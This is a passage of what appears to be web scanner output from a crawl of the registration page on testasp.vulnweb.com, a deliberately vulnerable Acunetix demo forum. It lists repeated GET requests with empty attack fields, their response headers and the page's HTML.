class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 525 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:01:19 GMT Content-Length: 3651 |
Response Body - size: 3,651 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 382 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3554 |
Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 372 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 3549 |
Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 372 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3549 |
Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 372 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 3549 |
Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 509 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:03:37 GMT Content-Length: 3635 |
Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a 